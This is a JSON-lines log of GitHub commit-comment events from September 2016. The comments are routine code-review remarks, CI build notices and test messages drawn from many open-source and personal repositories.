{"id":"4539543759","type":"CommitCommentEvent","actor":{"login":"noerw"},"repo":{"name":"JamesRamm/leaflet-sidenav"},"payload":{"comment":{"id":18961103,"position":null,"line":null,"path":null,"commit_id":"ad6a440288eea4627514f048c6331c7a620a357b","created_at":"2016-09-09T11:28:06Z","updated_at":"2016-09-09T11:28:06Z","body":"Supporting all the other mapping libraries slows down the development of this plugin significantly (2 mayor PRs where not merged because of missing jquery support), so I do support these decisions!\nIt would be interesting to know how big the userbase for this plugin is with ol3 or gmaps.."}},"created_at":"2016-09-09T11:28:06Z"}
{"id":"4539549523","type":"CommitCommentEvent","actor":{"login":"HutchinTang"},"repo":{"name":"HutchinTang/-test"},"payload":{"comment":{"id":18961114,"position":2,"line":2,"path":"README.md","commit_id":"348b640e6234291a2922baa81207f8a00ffd3405","created_at":"2016-09-09T11:29:43Z","updated_at":"2016-09-09T11:29:43Z","body":"地方撒旦撒"}},"created_at":"2016-09-09T11:29:43Z"}
{"id":"4539550471","type":"CommitCommentEvent","actor":{"login":"HutchinTang"},"repo":{"name":"HutchinTang/-test"},"payload":{"comment":{"id":18961115,"position":2,"line":2,"path":"README.md","commit_id":"348b640e6234291a2922baa81207f8a00ffd3405","created_at":"2016-09-09T11:29:59Z","updated_at":"2016-09-09T11:29:59Z","body":"的萨达"}},"created_at":"2016-09-09T11:29:59Z"}
{"id":"4539551045","type":"CommitCommentEvent","actor":{"login":"HutchinTang"},"repo":{"name":"HutchinTang/-test"},"payload":{"comment":{"id":18961118,"position":2,"line":2,"path":"README.md","commit_id":"348b640e6234291a2922baa81207f8a00ffd3405","created_at":"2016-09-09T11:30:10Z","updated_at":"2016-09-09T11:30:10Z","body":"的萨达"}},"created_at":"2016-09-09T11:30:10Z"}
{"id":"4539553512","type":"CommitCommentEvent","actor":{"login":"zcorpan"},"repo":{"name":"whatwg/html"},"payload":{"comment":{"id":18961122,"position":null,"line":null,"path":null,"commit_id":"1490eba4dba5ab476f0981443a86c01acae01311","created_at":"2016-09-09T11:30:46Z","updated_at":"2016-09-09T11:30:46Z","body":"Issue was https://github.com/whatwg/html/issues/331\r\nPR was https://github.com/whatwg/html/pull/484"}},"created_at":"2016-09-09T11:30:46Z"}
{"id":"4539555409","type":"CommitCommentEvent","actor":{"login":"vishr"},"repo":{"name":"labstack/echo"},"payload":{"comment":{"id":18961129,"position":null,"line":null,"path":null,"commit_id":"2d772e02cafe06456a1cb5f887248fc79ce9e5f1","created_at":"2016-09-09T11:31:16Z","updated_at":"2016-09-09T11:31:16Z","body":"@Nomon can you directly pass c?"}},"created_at":"2016-09-09T11:31:16Z"}
{"id":"4539558443","type":"CommitCommentEvent","actor":{"login":"msumit"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":18961137,"position":5,"line":58,"path":"airflow/contrib/operators/ssh_execute_operator.py","commit_id":"32f3c1c5d4acac56a1ebdc36cd9a8c71ace35e5c","created_at":"2016-09-09T11:32:08Z","updated_at":"2016-09-09T11:32:08Z","body":"@bolkedebruin as per my understanding `--tmpdir[=DIR]` without a `=DIR` i.e. `--tmpdir` just resolves to `$TMPDIR` or `/tmp`. `-t` also does the same.. So use of `-t` may be deprecated but atleast it works on both gnu and macos."}},"created_at":"2016-09-09T11:32:08Z"}
{"id":"4539558723","type":"CommitCommentEvent","actor":{"login":"wellzel"},"repo":{"name":"wellzel/cyber"},"payload":{"comment":{"id":18961138,"position":null,"line":null,"path":null,"commit_id":"784ff6235a7a7547f7f7566c5614a773157f48d3","created_at":"2016-09-09T11:32:12Z","updated_at":"2016-09-09T11:32:12Z","body":"test"}},"created_at":"2016-09-09T11:32:12Z"}
{"id":"4539562006","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18961142,"position":null,"line":null,"path":null,"commit_id":"b16849c29dc8a38cdc77dea5973677a2a47d1cac","created_at":"2016-09-09T11:33:06Z","updated_at":"2016-09-09T11:33:06Z","body":"另外载入standby图片的时候，可以有个很短的快速随机闪动效果（日光灯刚打开那种频闪效果）\r\n一方面让衔接更自然，另一方面也吸引视线到新的“事件区域”"}},"created_at":"2016-09-09T11:33:06Z"}
{"id":"4539562717","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"jenkinsci/browser-axis-plugin"},"payload":{"comment":{"id":18961147,"position":null,"line":null,"path":null,"commit_id":"8a5997a231c7adcfbcb3bcb7eb8110b9e8c74609","created_at":"2016-09-09T11:33:17Z","updated_at":"2016-09-09T11:33:17Z","body":"@lvotypko @vjuranek @ogondza do you plan release it?"}},"created_at":"2016-09-09T11:33:17Z"}
{"id":"4539563921","type":"CommitCommentEvent","actor":{"login":"Vad1mo"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18961156,"position":null,"line":null,"path":null,"commit_id":"d2e41fdd265ac47051b56c100bfa24a00397e653","created_at":"2016-09-09T11:33:37Z","updated_at":"2016-09-09T11:33:37Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T11:33:37Z"}
{"id":"4539565114","type":"CommitCommentEvent","actor":{"login":"MarcoFalke"},"repo":{"name":"bitcoin-core/bitcoincore.org"},"payload":{"comment":{"id":18961159,"position":55,"line":55,"path":"_posts/en/meetings/2016-08-25-meeting.md","commit_id":"96539901418e4ad6e033e3464330be702eeacfb0","created_at":"2016-09-09T11:33:56Z","updated_at":"2016-09-09T11:33:56Z","body":"@CyrusV5 pull request welcome."}},"created_at":"2016-09-09T11:33:56Z"}
{"id":"4539565611","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18961160,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T11:34:05Z","updated_at":"2016-09-09T11:34:05Z","body":"any real reason?\r\n\r\nthe reason it's 8 letters is because 8 letters is always quick to type.\r\n\r\nalso I fear changing this will just result in a massive amount of code churn and set renames which rarely helps anybody."}},"created_at":"2016-09-09T11:34:05Z"}
{"id":"4539565698","type":"CommitCommentEvent","actor":{"login":"Vad1mo"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18961161,"position":null,"line":null,"path":null,"commit_id":"d2e41fdd265ac47051b56c100bfa24a00397e653","created_at":"2016-09-09T11:34:06Z","updated_at":"2016-09-09T11:34:06Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T11:34:06Z"}
{"id":"4539565887","type":"CommitCommentEvent","actor":{"login":"Balakrishn971"},"repo":{"name":"Balakrishn971/TestRepository"},"payload":{"comment":{"id":18961162,"position":null,"line":null,"path":null,"commit_id":"dddac0571b71073ca74fa870a525d5535982129f","created_at":"2016-09-09T11:34:09Z","updated_at":"2016-09-09T11:34:09Z","body":"\r\n[pdf.pdf.txt](https://github.com/Balakrishn971/TestRepository/files/463851/pdf.pdf.txt)\r\n"}},"created_at":"2016-09-09T11:34:09Z"}
{"id":"4539566622","type":"CommitCommentEvent","actor":{"login":"Balakrishn971"},"repo":{"name":"Balakrishn971/TestRepository"},"payload":{"comment":{"id":18961164,"position":null,"line":null,"path":null,"commit_id":"dddac0571b71073ca74fa870a525d5535982129f","created_at":"2016-09-09T11:34:22Z","updated_at":"2016-09-09T11:34:22Z","body":"test file uploaded\r\n"}},"created_at":"2016-09-09T11:34:22Z"}
{"id":"4539567535","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18961166,"position":null,"line":null,"path":null,"commit_id":"d2e41fdd265ac47051b56c100bfa24a00397e653","created_at":"2016-09-09T11:34:36Z","updated_at":"2016-09-09T11:34:36Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T11:34:36Z"}
{"id":"4539569293","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18961173,"position":null,"line":null,"path":null,"commit_id":"d2e41fdd265ac47051b56c100bfa24a00397e653","created_at":"2016-09-09T11:35:06Z","updated_at":"2016-09-09T11:35:06Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T11:35:06Z"}
{"id":"4539570051","type":"CommitCommentEvent","actor":{"login":"rickyschoolsFS"},"repo":{"name":"FSInvestments/ListManagement"},"payload":{"comment":{"id":18961175,"position":null,"line":null,"path":null,"commit_id":"974affca523649b841df396b1317b7bebe506e24","created_at":"2016-09-09T11:35:15Z","updated_at":"2016-09-09T11:35:15Z","body":"#50 "}},"created_at":"2016-09-09T11:35:15Z"}
{"id":"4539570780","type":"CommitCommentEvent","actor":{"login":"martbab"},"repo":{"name":"apophys/freeipa"},"payload":{"comment":{"id":18961179,"position":null,"line":null,"path":null,"commit_id":"e5957198e61ca47b9ca9ae074986d8c3dc3facd2","created_at":"2016-09-09T11:35:26Z","updated_at":"2016-09-09T11:35:26Z","body":"I am missing a negative test case which will denied subjectaltname for a service not listed in CA ACL:\r\n\r\n1.) host1 manages both service1 and service2.\r\n2.) service1 is added to CA ACL but service2 is not.\r\n3.) host tries to request certificate for service1 having both host1 and host2 in subjectAltName using test subCA\r\n4.) CSR is denied because service2 inferred from DNS alt names is not in CA ACL\r\n\r\n"}},"created_at":"2016-09-09T11:35:26Z"}
{"id":"4539574314","type":"CommitCommentEvent","actor":{"login":"akonokhov"},"repo":{"name":"akonokhov/chef"},"payload":{"comment":{"id":18961196,"position":null,"line":null,"path":null,"commit_id":"752d0c65ea370c64f356dc11687cf5c2673416f3","created_at":"2016-09-09T11:36:22Z","updated_at":"2016-09-09T11:36:22Z","body":"User 'deployment' and his keys are already deleted at AWS :)"}},"created_at":"2016-09-09T11:36:22Z"}
{"id":"4539576418","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18961202,"position":null,"line":null,"path":null,"commit_id":"8b5a8f9bd5b4ad49e69a5c4f0c04a4c48f3b1feb","created_at":"2016-09-09T11:36:57Z","updated_at":"2016-09-09T11:36:57Z","body":"Splendid."}},"created_at":"2016-09-09T11:36:57Z"}
{"id":"4539576496","type":"CommitCommentEvent","actor":{"login":"simogasp"},"repo":{"name":"poparteu/CCTag"},"payload":{"comment":{"id":18961204,"position":16,"line":14,"path":".travis.yml","commit_id":"a63e3b100bf250e9d2784bbd4903b49395b85062","created_at":"2016-09-09T11:36:58Z","updated_at":"2016-09-09T11:36:58Z","body":"no, there should be a way to do it commonly for all the cases"}},"created_at":"2016-09-09T11:36:58Z"}
{"id":"4539578491","type":"CommitCommentEvent","actor":{"login":"rschaerer"},"repo":{"name":"sinndrin/sinndrin.github.io"},"payload":{"comment":{"id":18961206,"position":null,"line":null,"path":null,"commit_id":"44d0c659a58425d329e8da96898bc3b62c991bee","created_at":"2016-09-09T11:37:32Z","updated_at":"2016-09-09T11:37:32Z","body":"danke @jonasleimgruber ! :raised_hands: "}},"created_at":"2016-09-09T11:37:32Z"}
{"id":"4539580860","type":"CommitCommentEvent","actor":{"login":"tomfa"},"repo":{"name":"helleroy/beanstalk-workshop"},"payload":{"comment":{"id":18961213,"position":16,"line":16,"path":"notes.txt","commit_id":"04b29c79298a8ca42af6bb495cf4ec2587a7eec3","created_at":"2016-09-09T11:38:12Z","updated_at":"2016-09-09T11:38:12Z","body":"+= Snakke om muligheter og/eller demonstrere kort deployintegrasjoner med AWS CodeDeploy (?)"}},"created_at":"2016-09-09T11:38:12Z"}
{"id":"4539581287","type":"CommitCommentEvent","actor":{"login":"ashishbadal"},"repo":{"name":"ashishbadal/RepositoryOne"},"payload":{"comment":{"id":18961215,"position":null,"line":null,"path":null,"commit_id":"b8563aaafe80a75d84bc5e6b731a7133660e44ff","created_at":"2016-09-09T11:38:19Z","updated_at":"2016-09-09T11:38:19Z","body":"test1"}},"created_at":"2016-09-09T11:38:19Z"}
{"id":"4539585179","type":"CommitCommentEvent","actor":{"login":"tomfa"},"repo":{"name":"helleroy/beanstalk-workshop"},"payload":{"comment":{"id":18961227,"position":46,"line":46,"path":"notes.txt","commit_id":"04b29c79298a8ca42af6bb495cf4ec2587a7eec3","created_at":"2016-09-09T11:39:26Z","updated_at":"2016-09-09T11:39:26Z","body":"+= (?) CloudWatch logs. Har testet [her](http://notes.webutvikling.org/aws-send-ec2-logs-to-slack/)."}},"created_at":"2016-09-09T11:39:26Z"}
{"id":"4539587329","type":"CommitCommentEvent","actor":{"login":"ianlet"},"repo":{"name":"ianlet/rsync-homedir-excludes"},"payload":{"comment":{"id":18961237,"position":null,"line":null,"path":null,"commit_id":"7674d5a0ad9a75291adfcddd907788a6cbc6b9f0","created_at":"2016-09-09T11:40:01Z","updated_at":"2016-09-09T11:40:01Z","body":"Well I think most of them are not obsolete for everyone... But maybe you could add `vendor/` as a suggestion (commented) after `node_modules` & `bower_components` as it is the directory where all project dependencies are installed using Composer (Dependency Manager for PHP)."}},"created_at":"2016-09-09T11:40:01Z"}
{"id":"4539587849","type":"CommitCommentEvent","actor":{"login":"tomfa"},"repo":{"name":"helleroy/beanstalk-workshop"},"payload":{"comment":{"id":18961242,"position":44,"line":44,"path":"notes.txt","commit_id":"04b29c79298a8ca42af6bb495cf4ec2587a7eec3","created_at":"2016-09-09T11:40:10Z","updated_at":"2016-09-09T11:40:10Z","body":"+= (?) CloudWatch Alarms og notifs. Har testet [her](http://notes.webutvikling.org/send-aws-cloudwatch-alarms-to-slack/)"}},"created_at":"2016-09-09T11:40:10Z"}
{"id":"4539589332","type":"CommitCommentEvent","actor":{"login":"iburkov"},"repo":{"name":"MorphineForOdin/GoT2_LCG"},"payload":{"comment":{"id":18961243,"position":39,"line":39,"path":"GotLcg/GotLcg.Logger/Interfaces/ILogger.cs","commit_id":"ef2bf6335e8c14ec03ae7fce8d27b334f29f3f6f","created_at":"2016-09-09T11:40:31Z","updated_at":"2016-09-09T11:40:31Z","body":"We should have possibility to pass Exception as param for Warn, Error and Fatal"}},"created_at":"2016-09-09T11:40:31Z"}
{"id":"4539590543","type":"CommitCommentEvent","actor":{"login":"kpanier"},"repo":{"name":"test-editor/test-editor-xtext"},"payload":{"comment":{"id":18961246,"position":6,"line":29,"path":"rcp/org.testeditor.rcp4.views.projectexplorer/src/org/testeditor/rcp4/views/projectexplorer/TELabelProvider.xtend","commit_id":"d50521527e38322c0569292908a353fecb07407d","created_at":"2016-09-09T11:40:49Z","updated_at":"2016-09-09T11:40:49Z","body":"use source folder please."}},"created_at":"2016-09-09T11:40:49Z"}
{"id":"4539590724","type":"CommitCommentEvent","actor":{"login":"Butao"},"repo":{"name":"Butao/AulaCSS"},"payload":{"comment":{"id":18961247,"position":null,"line":null,"path":null,"commit_id":"ffa4ba70c3a6116a1676e887e358dd226749c269","created_at":"2016-09-09T11:40:53Z","updated_at":"2016-09-09T11:40:53Z","body":"Arquivo CSS da Tarefa de DW1 - Criando Página com cabeçalho e rodapé, com box de imagem"}},"created_at":"2016-09-09T11:40:53Z"}
{"id":"4539591641","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18961250,"position":null,"line":null,"path":null,"commit_id":"44ee21163c60d7d31473e4500d894e7160a41ad9","created_at":"2016-09-09T11:41:09Z","updated_at":"2016-09-09T11:41:09Z","body":"Idea is already being tested:\r\nhttp://tests.stockfishchess.org/tests/view/57d297250ebc59030fbe50ed"}},"created_at":"2016-09-09T11:41:09Z"}
{"id":"4539592660","type":"CommitCommentEvent","actor":{"login":"kpanier"},"repo":{"name":"test-editor/test-editor-xtext"},"payload":{"comment":{"id":18961252,"position":31,"line":86,"path":"common/org.testeditor.dsl.common.ui/src/org/testeditor/dsl/common/ui/utils/ProjectContentGenerator.xtend","commit_id":"d50521527e38322c0569292908a353fecb07407d","created_at":"2016-09-09T11:41:24Z","updated_at":"2016-09-09T11:41:24Z","body":"we have to fix the gradle template to use the folder"}},"created_at":"2016-09-09T11:41:24Z"}
{"id":"4539597499","type":"CommitCommentEvent","actor":{"login":"bertfrees"},"repo":{"name":"liblouis/liblouis"},"payload":{"comment":{"id":18961264,"position":null,"line":null,"path":null,"commit_id":"415236ef466d35676da474a2365f76c3531ae814","created_at":"2016-09-09T11:42:39Z","updated_at":"2016-09-09T11:42:39Z","body":"After talking to Christian I think the changes won't cause any big problems for VPATH builds.\r\n\r\nWe should note that this \"compromise\" solution is not ideal because there will still be two locations where the table can potentially be found. But no support at all for paths relative to the YAML file is also not ideal for the \"standalone\" use case, so we'll go for the compromise.\r\n\r\n"}},"created_at":"2016-09-09T11:42:39Z"}
{"id":"4539598958","type":"CommitCommentEvent","actor":{"login":"iburkov"},"repo":{"name":"MorphineForOdin/GoT2_LCG"},"payload":{"comment":{"id":18961267,"position":26,"line":26,"path":"GotLcg/GotLcg.Logger/Implementation/SerilogLoggerAdapter.cs","commit_id":"ef2bf6335e8c14ec03ae7fce8d27b334f29f3f6f","created_at":"2016-09-09T11:43:04Z","updated_at":"2016-09-09T11:43:04Z","body":"We should move logger configuration into config file of GotLcg.Web.Api"}},"created_at":"2016-09-09T11:43:04Z"}
{"id":"4539601374","type":"CommitCommentEvent","actor":{"login":"iburkov"},"repo":{"name":"MorphineForOdin/GoT2_LCG"},"payload":{"comment":{"id":18961271,"position":15,"line":15,"path":"GotLcg/GotLcg.Logger/Implementation/SerilogLoggerAdapter.cs","commit_id":"ef2bf6335e8c14ec03ae7fce8d27b334f29f3f6f","created_at":"2016-09-09T11:43:41Z","updated_at":"2016-09-09T11:43:41Z","body":"unnecessary _logger = null assigment"}},"created_at":"2016-09-09T11:43:41Z"}
{"id":"4539607272","type":"CommitCommentEvent","actor":{"login":"DhanshreeK"},"repo":{"name":"swapiis/SchoolERP"},"payload":{"comment":{"id":18961282,"position":null,"line":null,"path":null,"commit_id":"4d19da5fcd5369ebc8197346a05ba0b357db5619","created_at":"2016-09-09T11:45:17Z","updated_at":"2016-09-09T11:45:17Z","body":"Only migration file is added"}},"created_at":"2016-09-09T11:45:17Z"}
{"id":"4539607706","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18961283,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-09T11:45:24Z","updated_at":"2016-09-09T11:45:24Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.270.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76856&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:26:56"}},"created_at":"2016-09-09T11:45:24Z"}
{"id":"4539608782","type":"CommitCommentEvent","actor":{"login":"edele"},"repo":{"name":"sadcitizen/doremi"},"payload":{"comment":{"id":18961288,"position":8,"line":8,"path":"tests/string/plural.spec.js","commit_id":"744f74196c5228e84c52d3708b907089d56c2421","created_at":"2016-09-09T11:45:41Z","updated_at":"2016-09-09T11:45:41Z","body":"Тут проверяется автоматическое определение локали?\r\nЕсли да, то лучше так и указать в описании кейса"}},"created_at":"2016-09-09T11:45:41Z"}
{"id":"4539611428","type":"CommitCommentEvent","actor":{"login":"CreeperMario"},"repo":{"name":"QuarkTheAwesome/ProgrammingOnTheU"},"payload":{"comment":{"id":18961297,"position":null,"line":null,"path":null,"commit_id":"398fe5c345ca11e513573a624793c36ce8bad66f","created_at":"2016-09-09T11:46:23Z","updated_at":"2016-09-09T11:46:23Z","body":"My thought: Leave code examples in the code repository, but move the tutorial chapters into the wiki, so that others can edit it as well (to a certain extent).\r\n\r\nJust a thought... ;)"}},"created_at":"2016-09-09T11:46:23Z"}
{"id":"4539612574","type":"CommitCommentEvent","actor":{"login":"edele"},"repo":{"name":"sadcitizen/doremi"},"payload":{"comment":{"id":18961302,"position":15,"line":15,"path":"tests/string/plural.spec.js","commit_id":"744f74196c5228e84c52d3708b907089d56c2421","created_at":"2016-09-09T11:46:41Z","updated_at":"2016-09-09T11:46:41Z","body":"Дублируется массив с формами постоянно. Вынесешь в переменную? @tolms "}},"created_at":"2016-09-09T11:46:41Z"}
{"id":"4539619819","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18961315,"position":null,"line":null,"path":null,"commit_id":"7d02f5f25a517a6f86ee46c6f0306ab67a4bf078","created_at":"2016-09-09T11:48:35Z","updated_at":"2016-09-09T11:48:35Z","body":"I took me a while to understand this! :-)\r\nMaybe for consistency lines 135-136 should be\r\n```\r\n        left       = (file_bb(f) & ~FileABB) >> 1;\r\n        right      = (file_bb(f) & ~FileHBB) << 1;\r\n```\r\nBut the logic seems fine and at most minor optimizations are possible. So, no midgame penalty?\r\n\r\nGood luck!"}},"created_at":"2016-09-09T11:48:35Z"}
{"id":"4539620930","type":"CommitCommentEvent","actor":{"login":"reckart"},"repo":{"name":"dkpro/dkpro-core"},"payload":{"comment":{"id":18961319,"position":null,"line":null,"path":null,"commit_id":"8274571765590f3d55a92c37fb1fe585447b2fbb","created_at":"2016-09-09T11:48:53Z","updated_at":"2016-09-09T11:48:53Z","body":"Are you aware of `de.tudarmstadt.ukp.dkpro.core.api.resources.ResourceUtils` and `org.apache.commons.io.IOUtils`?"}},"created_at":"2016-09-09T11:48:53Z"}
{"id":"4539622631","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18961323,"position":null,"line":null,"path":null,"commit_id":"44ee21163c60d7d31473e4500d894e7160a41ad9","created_at":"2016-09-09T11:49:21Z","updated_at":"2016-09-09T11:49:21Z","body":"What is even stranger, is that the submitted test also uses my repository and fork..."}},"created_at":"2016-09-09T11:49:21Z"}
{"id":"4539622889","type":"CommitCommentEvent","actor":{"login":"alexandesigner"},"repo":{"name":"meteor/blaze"},"payload":{"comment":{"id":18961324,"position":4,"line":12,"path":"site/package.json","commit_id":"d36d0a612d947eb7193c9a2a57188c6fb4903135","created_at":"2016-09-09T11:49:26Z","updated_at":"2016-09-09T11:49:26Z","body":"Our.. Haha, sorry for the oversight. "}},"created_at":"2016-09-09T11:49:26Z"}
{"id":"4539625068","type":"CommitCommentEvent","actor":{"login":"demeshkin"},"repo":{"name":"htmlacademy-javascript/55631-kekstagram"},"payload":{"comment":{"id":18961326,"position":4,"line":66,"path":"src/pictures.js","commit_id":"d616d6268dd8ad44beb460773aa2de99a345fd73","created_at":"2016-09-09T11:49:59Z","updated_at":"2016-09-09T11:49:59Z","body":"Тут вызов nextPage не имеет смысле, так как ты уже запрашиваешь картинки на предыдущей строке."}},"created_at":"2016-09-09T11:49:59Z"}
{"id":"4539631072","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":18961337,"position":6,"line":0,"path":"documentation/1.3/tour/language-module.md","commit_id":"a7d994150bbd5b917955112a5de5fa4f9318c2cf","created_at":"2016-09-09T11:51:34Z","updated_at":"2016-09-09T11:51:34Z","body":"Points to map"}},"created_at":"2016-09-09T11:51:34Z"}
{"id":"4539632528","type":"CommitCommentEvent","actor":{"login":"titimoby"},"repo":{"name":"k33g/bob.the.bot"},"payload":{"comment":{"id":18961341,"position":31,"line":10,"path":"scripts/feature.hendrix.js","commit_id":"5e4aec1325fe5bdb04cac2f84def694b102aa56e","created_at":"2016-09-09T11:51:57Z","updated_at":"2016-09-09T11:51:57Z","body":"@k33g \r\nwhy defining those tokens as they are not used after that?\r\n(just to improve my knowledge)"}},"created_at":"2016-09-09T11:51:57Z"}
{"id":"4539632866","type":"CommitCommentEvent","actor":{"login":"Atyaf-dhari"},"repo":{"name":"gkhandelwal/HoneyBeeLoadBalancer"},"payload":{"comment":{"id":18961343,"position":null,"line":null,"path":null,"commit_id":"65d04f0b8eaaa71ef353cc3c1c92f446b2069356","created_at":"2016-09-09T11:52:03Z","updated_at":"2016-09-09T11:52:03Z","body":"Hello, please where can  I get the paper of this project"}},"created_at":"2016-09-09T11:52:03Z"}
{"id":"4539634940","type":"CommitCommentEvent","actor":{"login":"michaelklishin"},"repo":{"name":"rabbitmq/rabbitmq-management"},"payload":{"comment":{"id":18961352,"position":4,"line":174,"path":"src/rabbit_mgmt_db.erl","commit_id":"8e87801dc952d8db8c25694439a611144f9a72d0","created_at":"2016-09-09T11:52:36Z","updated_at":"2016-09-09T11:52:36Z","body":"This misplaces the comment above, making it confusing."}},"created_at":"2016-09-09T11:52:36Z"}
{"id":"4539635045","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18961353,"position":null,"line":null,"path":null,"commit_id":"9b4e0a1a1373f8e1fa451de2d1d3b411d52ed431","created_at":"2016-09-09T11:52:38Z","updated_at":"2016-09-09T11:52:38Z","body":"Awesome will do some testing today and give you some feedback. "}},"created_at":"2016-09-09T11:52:38Z"}
{"id":"4539635537","type":"CommitCommentEvent","actor":{"login":"ingram2007"},"repo":{"name":"ingram2007/ingramtest"},"payload":{"comment":{"id":18961354,"position":null,"line":null,"path":null,"commit_id":"41d75f0b8cac87b643b2bdea6a635511f3c85c8b","created_at":"2016-09-09T11:52:47Z","updated_at":"2016-09-09T11:52:47Z","body":"cool"}},"created_at":"2016-09-09T11:52:47Z"}
{"id":"4539638632","type":"CommitCommentEvent","actor":{"login":"kjnilsson"},"repo":{"name":"rabbitmq/rabbitmq-management"},"payload":{"comment":{"id":18961361,"position":4,"line":174,"path":"src/rabbit_mgmt_db.erl","commit_id":"8e87801dc952d8db8c25694439a611144f9a72d0","created_at":"2016-09-09T11:53:37Z","updated_at":"2016-09-09T11:53:37Z","body":"yes just noticed that too, will be fixed in the next commit."}},"created_at":"2016-09-09T11:53:37Z"}
{"id":"4539641844","type":"CommitCommentEvent","actor":{"login":"KDSKardabox"},"repo":{"name":"KDSKardabox/Pokemon-Emerald-Battle-Engine-Upgrade"},"payload":{"comment":{"id":18961367,"position":null,"line":null,"path":null,"commit_id":"e96b0f40fd0cf35b844adcabd62082dad75ce724","created_at":"2016-09-09T11:54:27Z","updated_at":"2016-09-09T11:54:27Z","body":"*unnerve"}},"created_at":"2016-09-09T11:54:27Z"}
{"id":"4539642140","type":"CommitCommentEvent","actor":{"login":"dwradcliffe"},"repo":{"name":"rubygems/rubygems.org"},"payload":{"comment":{"id":18961368,"position":null,"line":null,"path":null,"commit_id":"53eadf5184bad12e9e6093108fdd8b3dd7c55475","created_at":"2016-09-09T11:54:32Z","updated_at":"2016-09-09T11:54:32Z","body":"They don't need them, but versions are immutable so we will store that\nforever.\n\nOn Friday, September 9, 2016, Code Ass <notifications@github.com> wrote:\n\n> @dwradcliffe <https://github.com/dwradcliffe> If the version of gem is\n> yanked, users can not download it. So I think that users don't need SHA-256\n> in this case.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rubygems/rubygems.org/commit/53eadf5184bad12e9e6093108fdd8b3dd7c55475#commitcomment-18957744>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAHQQgCe5ap1PD-hUDt7butTdC1T1b1Uks5qoOaHgaJpZM4J4Wn4>\n> .\n>\n\n\n-- \n---\nDavid Radcliffe\n"}},"created_at":"2016-09-09T11:54:32Z"}
{"id":"4539647402","type":"CommitCommentEvent","actor":{"login":"jnorkus"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":18961377,"position":16,"line":127,"path":"angularjs/angular.d.ts","commit_id":"12ede35d5b3d5d5595ce6edf41f6f1a96ea33d1f","created_at":"2016-09-09T11:55:52Z","updated_at":"2016-09-09T11:55:52Z","body":"https://github.com/DefinitelyTyped/DefinitelyTyped/pull/11144"}},"created_at":"2016-09-09T11:55:52Z"}
{"id":"4539648024","type":"CommitCommentEvent","actor":{"login":"mizapf"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18961378,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T11:56:03Z","updated_at":"2016-09-09T11:56:03Z","body":"I'd rather have software names longer than 8 characters to avoid such cryptic names like \"nbrdyseq\" (Milliken Math Sequences - Number Readiness), \"speedrda\" (Speed Reading A), \"scholsp4\" (Scholastic Spelling Level 4), \"junkmnj\" (Junkman Junior) and so on."}},"created_at":"2016-09-09T11:56:03Z"}
